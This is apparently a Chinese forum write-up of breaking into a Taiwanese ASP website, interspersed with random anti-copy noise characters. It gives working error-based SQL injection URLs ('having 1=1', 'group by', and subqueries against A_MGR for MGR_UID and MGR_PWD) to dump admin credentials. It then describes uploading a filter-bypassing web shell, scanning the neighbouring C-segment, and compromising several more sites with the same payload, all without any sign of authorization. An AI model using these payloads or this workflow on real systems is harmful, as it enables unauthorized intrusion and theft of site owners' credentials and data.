发现一个注入点* r4 r0 r/ @# l; a% {$ a
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389* l9 v# l9 p1 {8 d8 m, J T$ q4 G
3 C% ^" o# C/ u( @# u9 k7 V习惯性的加’having1=1--/ A: e) q1 Y {
4 E8 m$ E- `" yhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—8 f# n# o3 I; i- K; _
- j0 h4 b- D& D1 {) [
0
/ y, G( x( O' q/ [
- Z d; F5 O" ?* x5 ?, S* q0 V爆出Diary_A.dl_Title(这时候很激动啊)
8 ?: C% [9 E6 L" J' G; b( A4 C" O! P8 ?6 c
那么继续
/ Z0 ]% v* b. E5 M) {+ p: s- L' D" dhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
- `2 ]6 b" b/ m- d) b/ x2 O) {- i8 ?; L" W" D/ t0 [
继续,一直爆下去7 o" F. V2 ~# |2 O" B& u
G7 n8 Q ^7 G/ y
爆到几个字段和表段 但是没找到需要的管理用户的字段; V7 {! _- Q1 q+ c* Q
0 g, `* T) Y) y5 |蛋疼了 怎么办 然后去后台登陆页看源码3 a% {; d- I$ A9 R# m; a) \7 M
# |- e5 m0 n* L7 V
0$ P, r* \8 U: F8 R$ {! F$ }( `: b; D1 m5 B
1 l& M7 g6 k* g: d4 r X5 T
Input name= “ADUID”
+ R8 {( @ t$ v0 a" SInput name= “ADPWD”, g( c% ^" f( j9 T% Z
+ [) o/ W8 M3 b6 K8 O很幸运 找到了字段那就继续% d- Z( [* G' o O% h2 g$ n
找到之后开始爆用户
. d2 U; w O# n3 _$ I( i. khttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
1 t5 B* k1 [0 ~/ ?! q$ p爆密码2 e; L" L5 e, {
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—: {' [8 O, r& I* ^$ n
测试了下 这个注入点只能爆到文章哪里的表 % s, p; M. o3 M$ G7 t* [
: n$ _; M/ _" I) v0 j
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
; j( @! D8 `9 j, ?2 b, H/ A$ E
' K3 F9 C4 }* J" I" m又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
- |5 o" V }$ _9 [: ^7 k. b1 F: q* X* \
473
% x/ K2 A( M; B! Y
% |* {2 e, K7 t; Z: [3 _& P6 y% P2 }进后台
5 a' N' n2 i8 `+ r8 `* ^( {, }" `7 X b* @
0 O) U+ c. s' E
发现几个上传点 有的地方不能上传 而且防止恶意代码
$ ]: q& w B9 z. u1 O( X
* N+ Q4 Y Z, a! |! `没办法 各种百度各种找大牛 找到一只好像可以突破的马: T, f+ w) {3 v: r. i" H, ?9 \
/ K0 q: U3 R- r4 W" G3 ^, S& ~
% x3 y; [3 L+ s0 m- u1 ?5 k( L在系统管理那里直接上传 不过没有显示地址
5 K6 [; U7 @0 S8 i' ?# {) O) D
* l7 E2 w9 d$ v再上传一次 抓包 搞定OK
2 }; r" e8 |5 q r* s- k+ N2 {! d/ R5 W
. Q/ v) X @# x7 o9 @$ E" h; H" P/ F4 `2 k0 y
472
$ \& a3 N4 T5 V" C) ~& o1 R5 ^' _% Y6 R( {
晚上不行了 去睡觉。。。
8 _" u* K9 h. u; M6 A, |* r: n第二天刚起床 闲的没事做继续日站吧 & v; t1 `- |1 U; v! p
" V+ r0 Y9 ]; K4 u1 W找个站 就把这个站的旁c扫了下* W P- k- N/ |. m* B
9 r" I$ _7 j: ~) y; k. w) l
发现c段也有一个购物站 ,然后还和这个站的模板差不多
% D( Q9 O2 s- P0 e( B( x
3 K2 I% H$ T# |. K就找到会员登录口测试
5 L6 p8 x+ u" V
: ^% s% m5 _% J5 d0 Q0 ?5 X3 p2 E'and (select top 1 MGR_UID from A_MGR)>0—8 ]+ R! A3 K* }
果断爆到了 这时候我很激动 通杀" h: c2 V& S) U! ]" ^" ^. a
P9 ~3 h5 Z t
再次翻c段
& G; ? d# O$ F: G+ X: C9 Q0 g* W3 g" W
翻出几个站 都成功拿下' r6 Y* {+ K# x
, }- w$ R, s, Z7 I4 W; T7 V
9 Z0 N8 }$ k! m' d1 m, ^/ A D4 ?8 z$ m: Y* b6 E
修复方案:! f H% {* t! ~5 K& X; q+ L) Q
他们比我专业
7 G* ~) V( b% u) M( o2 a) ]
6 ` M" T8 H2 ?/ q3 [: F
; S) ?' B" A& S3 G8 q ?, o3 e! l& ^7 Y3 L# ~! o0 F- m% Z8 L& c" {
|